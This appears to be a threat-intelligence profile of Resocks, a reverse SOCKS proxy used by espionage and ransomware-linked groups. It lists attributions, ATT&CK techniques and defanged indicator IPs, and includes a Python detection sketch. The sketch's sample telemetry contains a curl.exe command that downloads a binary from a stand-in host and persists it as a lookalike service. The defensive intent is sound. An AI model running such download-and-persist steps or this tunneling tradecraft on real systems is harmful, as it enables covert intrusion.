Resocks
Resocks is a Go-based reverse proxy/SOCKS-style utility used by multiple threat clusters as a post-compromise access and tunneling tool. Reporting describes it as a readily accessible tool from GitHub that effectively turns a compromised host into a secure relay point. It has been observed packaged in password-protected RAR archives alongside other tunneling tools such as chisel, and deployed after initial compromise to provide proxy access, support remote command execution through relays, and facilitate lateral movement.
High-confidence reporting links Resocks to at least three distinct activity sets. Hydra Saiga (also tracked as Yorotrooper, ShadowSilk, and Silent Lynx), a suspected Kazakhstan-aligned espionage actor, used commodity tools including Resocks together with Telegram-based custom implants, Havoc, and Meterpreter while targeting government, energy, and critical infrastructure organizations across Central Asia, Europe, and the Middle East. In that activity, operators used WMI or PsExec to deploy a reverse SOCKS5 proxy client after domain discovery. Bitdefender also reported heavy use of Resocks by the Curly COMrades espionage cluster targeting judicial and government entities in Georgia and an energy distribution company in Moldova; it was the most frequently observed proxy tool in that campaign. Recovered samples were built with the Go obfuscation utility garble, were commonly configured to communicate over port 443 (8443 in one case), and were persisted via scheduled tasks and Windows services named to resemble legitimate components. Observed Resocks endpoints in that reporting included 91.107.174[.]190, 96.30.124[.]103, 194.87.31[.]171, 75.127.13[.]136, 94.131.109[.]91, and 207.180.194[.]109. In one Moldova case, a Resocks client made an HTTP request to a Redmine server over port 3000 in Ukraine, assessed as a compromised relay. Kaspersky separately reported that the ransomware-linked groups Crypt Ghouls and MorLock used the same Resocks utility.
Overall, the tool is associated with covert network access, proxying, and relay functionality on compromised Windows environments, especially in hands-on-keyboard intrusions where operators need persistent internal access and traffic forwarding.
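As an added example (not code from this page or from the Resocks project), the following Python sketch turns the deployment and persistence traits described above into host-level detection logic run over constructed endpoint telemetry: a process spawned by WmiPrvSE.exe or PSEXESVC.exe, a curl.exe download to disk, a service or scheduled task with a lookalike name whose binary lives outside trusted directories, and TLS-port egress from a non-browser process. Host names, file paths, the 198.51.100.7 address and the lookalike-name pattern are assumptions made for the example.

```python
import re
from collections import defaultdict

REMOTE_EXEC_PARENTS = {"wmiprvse.exe", "psexesvc.exe"}
TRUSTED_DIRS = (r"c:\windows\system32", r"c:\program files")
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "outlook.exe"}
# Assumed heuristic: words an operator might reuse to make a service/task look legitimate
LOOKALIKE = re.compile(r"(windows|microsoft|update|defender|svc|service)", re.I)

def flags_for(ev):
    """Return heuristic flags for one telemetry event (dict)."""
    flags, kind = [], ev["type"]
    image, path = ev.get("image", "").lower(), ev.get("path", "").lower()
    if kind == "process":
        parent = ev.get("parent", "").lower().rsplit("\\", 1)[-1]
        if parent in REMOTE_EXEC_PARENTS:
            flags.append("spawned-by-wmi-or-psexec")
        if image.endswith("curl.exe") and re.search(r"\s(-o|--output)\s", ev.get("cmdline", "")):
            flags.append("curl-download")
    elif kind in ("service", "task"):
        if LOOKALIKE.search(ev.get("name", "")) and not path.startswith(TRUSTED_DIRS):
            flags.append(f"lookalike-{kind}-outside-trusted-dirs")
    elif kind == "network":
        exe = image.rsplit("\\", 1)[-1]
        if ev.get("dport") in (443, 8443) and exe not in BROWSERS and not image.startswith(TRUSTED_DIRS):
            flags.append("non-browser-tls-egress")
    return flags

def correlate(events, min_flags=2):
    """Group flags per host; report hosts showing at least min_flags distinct traits."""
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev["host"]].update(flags_for(ev))
    return {h: sorted(f) for h, f in per_host.items() if len(f) >= min_flags}

EVENTS = [  # constructed sample telemetry, not taken from any real incident
    {"host": "ws01", "type": "process", "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe http://198.51.100.7/w.bin -o C:\Users\Public\wupd.exe"},
    {"host": "ws01", "type": "service", "name": "WindowsUpdateHelper", "path": r"C:\Users\Public\wupd.exe"},
    {"host": "ws01", "type": "network", "image": r"C:\Users\Public\wupd.exe", "dport": 443},
    {"host": "ws02", "type": "network", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "dport": 443},
    {"host": "ws02", "type": "service", "name": "Windows Defender",
     "path": r"C:\Program Files\Windows Defender\MsMpEng.exe"},
]

if __name__ == "__main__":
    for host, flags in correlate(EVENTS).items():
        print(host, flags)
```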
Groups observed using it
4 distinct threat actors attributed by public researchers.
"...both Crypt Ghouls and MorLock used the same resocks utility..."
"These tools were commonly packaged in password-protected RAR archives, and ranged from reverse proxy clients like resocks and tunnelling software like chisel..."
Techniques & procedures
6 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique: "Open-source tools: Neo-reGeorg, resocks, revsocks, patator"
Execution
1 technique: "used either Windows Management Instrumentation (WMI) or PsExec to download and execute a reverse socks5 proxy client"
Lateral Movement
1 technique: "used either Windows Management Instrumentation (WMI) or PsExec"
Command and Control
3 techniques: "MuddyWater was observed leveraging the Chinese-developed tool Neo-reGeorg to perform webshell-based SOCKS pivoting... Additionally, the tool resocks was used... Similarly, an alternative tool revsocks was also used"
"tunnelling software like chisel"; "reverse socks5 proxy client"
IOCs tracked for this family
11 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
IPs, domains, and DNS infrastructure linked to this family.
Other indicator types observed in public reporting.
Recent activity
4 sources tracked across advisories, community write-ups, and news.
An open-source reverse SOCKS5 proxy used for pivoting/tunneling and maintaining operator connectivity during post-exploitation; Hydra Saiga used it for lateral movement and to establish proxy access back to their infrastructure.
Go-based proxy tool used as a relay/egress mechanism to route attacker traffic through compromised infrastructure.
Proxy/SOCKS utility used to route traffic and support covert connectivity during operations.
Open-source proxy/tunneling tool used to create SOCKS-style relay points inside victim networks, enabling attacker traffic routing and remote command execution through established tunnels; persisted via scheduled tasks/services and often retrieved/executed via curl.exe.